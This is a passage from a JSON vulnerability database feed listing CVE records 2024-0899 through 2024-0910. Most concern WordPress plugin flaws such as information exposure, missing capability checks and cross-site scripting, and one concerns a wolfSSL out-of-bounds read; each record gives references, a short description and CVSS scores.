1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0899", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3051411%40s2member%2Ftrunk&old=3037346%40s2member%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3051411%40s2member%2Ftrunk&old=3037346%40s2member%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3051411%40s2member%2Ftrunk&old=3037346%40s2member%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3051411%40s2member%2Ftrunk&old=3037346%40s2member%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/80bfb470-a3df-497f-940d-051ccaa6215b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/80bfb470-a3df-497f-940d-051ccaa6215b?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/80bfb470-a3df-497f-940d-051ccaa6215b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/80bfb470-a3df-497f-940d-051ccaa6215b?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The s2Member – Best Membership Plugin for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 230815 via the API. This makes it possible for unauthenticated attackers to see the contents of those posts and pages." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0900", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3071565%40elespare&new=3071565%40elespare&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3071565%40elespare&new=3071565%40elespare&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3071565%40elespare&new=3071565%40elespare&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3071565%40elespare&new=3071565%40elespare&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f94efa6-b88b-442d-8162-f03efa7f2f65?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f94efa6-b88b-442d-8162-f03efa7f2f65?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f94efa6-b88b-442d-8162-f03efa7f2f65?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f94efa6-b88b-442d-8162-f03efa7f2f65?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Elespare – Build Your Blog, News & Magazine Websites with Expert-Designed Template Kits. One Click Import: No Coding Skills Required! plugin for WordPress is vulnerable to unauthorized post creation due to a missing capability check on the elespare_create_post() function hooked via AJAX in all versions up to, and including, 2.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-23T09:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0901", "ASSIGNER" : "facts@wolfssl.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/wolfSSL/wolfssl/issues/7089", "name" : "https://github.com/wolfSSL/wolfssl/issues/7089", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/wolfSSL/wolfssl/issues/7089", "name" : "https://github.com/wolfSSL/wolfssl/issues/7089", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/wolfSSL/wolfssl/pull/7099", "name" : "https://github.com/wolfSSL/wolfssl/pull/7099", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/wolfSSL/wolfssl/pull/7099", "name" : "https://github.com/wolfSSL/wolfssl/pull/7099", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Remotely executed SEGV and out of bounds read allows malicious packet sender to crash or cause an out of bounds read via sending a malformed packet with the correct length.\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-25T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0902", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/fd53e40a-516b-47b9-b495-321774432367/", "name" : "https://wpscan.com/vulnerability/fd53e40a-516b-47b9-b495-321774432367/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/fd53e40a-516b-47b9-b495-321774432367/", "name" : "https://wpscan.com/vulnerability/fd53e40a-516b-47b9-b495-321774432367/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Fancy Product Designer WordPress plugin before 6.1.81 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "6.1.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-15T05:15Z", "lastModifiedDate" : "2025-04-07T14:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0903", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_submitted' 'link' value in all versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in the feedback submission page that will execute when a user clicks the link, while also pressing the command key." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:monsterinsights:userfeedback:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding" : "1.0.14", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-22T06:15Z", "lastModifiedDate" : "2025-02-05T17:42Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0904", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/baf4afc9-c20e-47d6-a798-75e15652d1e3/", "name" : "https://wpscan.com/vulnerability/baf4afc9-c20e-47d6-a798-75e15652d1e3/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/baf4afc9-c20e-47d6-a798-75e15652d1e3/", "name" : "https://wpscan.com/vulnerability/baf4afc9-c20e-47d6-a798-75e15652d1e3/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Fancy Product Designer WordPress plugin before 6.1.81 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.1.81", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-05-06T06:15Z", "lastModifiedDate" : "2025-05-08T16:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0905", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/3b9eba0d-29aa-47e4-b17f-4cf4bbf8b690/", "name" : "https://wpscan.com/vulnerability/3b9eba0d-29aa-47e4-b17f-4cf4bbf8b690/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/3b9eba0d-29aa-47e4-b17f-4cf4bbf8b690/", "name" : "https://wpscan.com/vulnerability/3b9eba0d-29aa-47e4-b17f-4cf4bbf8b690/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Fancy Product Designer WordPress plugin before 6.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against unauthenticated and admin-level users" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.1.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-26T05:15Z", "lastModifiedDate" : "2025-05-08T19:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0906", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/fx-private-site/", "name" : "https://wordpress.org/plugins/fx-private-site/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/fx-private-site/", "name" : "https://wordpress.org/plugins/fx-private-site/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The f(x) Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the API. This makes it possible for unauthenticated attackers to obtain page and post contents of a site protected with this plugin." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:shellcreeper:f\\(x\\)_private_site:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.2.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-12T09:15Z", "lastModifiedDate" : "2025-03-13T01:22Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0907", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512", "name" : "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The NEX-Forms – Ultimate Form Builder – Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the restore_records() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to restore records." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "8.5.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-15T17:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0908", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/advanced-post-block/trunk/plugin.php#L173", "name" : "https://plugins.trac.wordpress.org/browser/advanced-post-block/trunk/plugin.php#L173", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8fb6c221-d885-42b5-977c-39e8608e3e31?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8fb6c221-d885-42b5-977c-39e8608e3e31?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/advanced-post-block/trunk/plugin.php#L173", "name" : "https://plugins.trac.wordpress.org/browser/advanced-post-block/trunk/plugin.php#L173", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8fb6c221-d885-42b5-977c-39e8608e3e31?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8fb6c221-d885-42b5-977c-39e8608e3e31?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Advanced Post Block – Display Posts, Pages, or Custom Posts on Your Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the apbPosts() function hooked via an AJAX action in all versions up to, and including, 1.13.1. This makes it possible for unauthenticated attackers to retrieve all post data, including those that may be password protected." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-02T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0909", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts/pages that protections are being place on. This makes it possible for unauthenticated attackers to access protected content." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cayenne:anonymous_restricted_content:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.6.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-03T06:15Z", "lastModifiedDate" : "2025-07-16T13:23Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0910", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/restrict-for-elementor/", "name" : "https://wordpress.org/plugins/restrict-for-elementor/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/plugins/restrict-for-elementor/", "name" : "https://wordpress.org/plugins/restrict-for-elementor/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/14993c04-7fe3-4c42-a605-2e431df14d79?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Restrict for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.6 due to improper restrictions on hidden data that make it accessible through the REST API. This makes it possible for unauthenticated attackers to extract potentially sensitive data from post content." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:restrict:restrict_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-06-06T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0911", "ASSIGNER" : "patrick@puiterwijk.org" }, "problemtype" 